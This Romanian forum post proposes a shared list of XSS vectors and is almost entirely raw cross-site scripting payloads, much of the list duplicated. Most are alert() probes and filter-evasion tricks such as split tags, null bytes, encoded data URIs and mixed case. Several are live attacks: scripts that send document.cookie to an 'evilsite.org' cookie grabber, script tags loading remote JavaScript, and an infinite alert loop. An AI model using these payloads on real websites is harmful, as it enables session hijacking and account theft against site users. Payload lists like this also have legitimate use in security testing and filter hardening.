Jump to content
sarmulita

Lista cu vectori

By sarmulita, in Off-topic

Recommended Posts

sarmulita Newbie

sarmulita

Posted
Posted

M-am gandit sa facem o lista mare cu vectori xss, adaugati si voi ce aveti prin bucatarie :).

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">

'">><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'>><marquee><h1>XSS</h1></marquee>

"><script alert(String.fromCharCode(88,83,83))</script>

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

<div
style="x:expression((window.r==1)?'':eval('r=1;ale rt(String.fromCharCo
de(88,83,83));'))">

window.alert("Xyli !");

"><img src=x onerror=confirm('x') />

"/></a></><img src=1.gif onerror=alert(1)>

[color=red' onmouseover="alert('xss')"]mouse over

<body onLoad="alert('XSS');"

<body onunload="javascript:alert('XSS');">

click me

<script language="JavaScript">alert('XSS')</script>

<img src="javascript:alert('XSS')">

'); alert('XSS

<font style='color:expression(alert(document.cookie))'>

<IMG DYNSRC=\"javascript:alert('XSS')\">

<IMG LOWSRC=\"javascript:alert('XSS')\">

</textarea><script>alert(/xss/)</script>

</title><script>alert(/xss/)</script>

<script src=http://yoursite.com/your_files.js></script>

"><script>alert(0)</script>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"jav	ascript:alert('XSS');\">

<marquee><script>alert('XSS')</script></marquee>

<? echo('<scr)';
echo('ipt>alert(\"XSS\")</script>'); ?>

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"jav	ascript:alert('XSS');\"> 222222222222222222222222222222222222

<marquee><script>alert('XSS')</script></marquee>

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<img src=foo.png onerror=alert(/xssed/) />

<script>alert(String.fromCharCode(88,83,83))</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
escape(document.cookie)</script>

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>alert('XSS');</script>

<script>alert(1);</script>

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<script>alert(1);</script>

<script>alert('XSS');</script>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>alert(String.fromCharCode(88,83,83))</script>

<img src=foo.png onerror=alert(/xssed/) />

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

<IMG SRC=\"jav	ascript:alert('XSS');\">

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"><script>alert(0)</script>

<script src=http://yoursite.com/your_files.js></script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<IMG LOWSRC=\"javascript:alert('XSS')\">

<IMG DYNSRC=\"javascript:alert('XSS')\">

<font style='color:expression(alert(document.cookie))'>

<img src="javascript:alert('XSS')">

<script language="JavaScript">alert('XSS')</script>

<body onunload="javascript:alert('XSS');">

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">

<script>var var = 1; alert(var)</script>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<IMG SRC='vbscript:msgbox(\"XSS\")'>

" onfocus=alert(document.domain) "> <"

<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<br size=\"&{alert('XSS')}\">

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

<BASE HREF="javascript:alert('XSS');//">

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

<body onLoad="while(true) alert('XSS');">

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<html><noalert><noscript>(123)</noscript><script>(123)</script>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>

<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...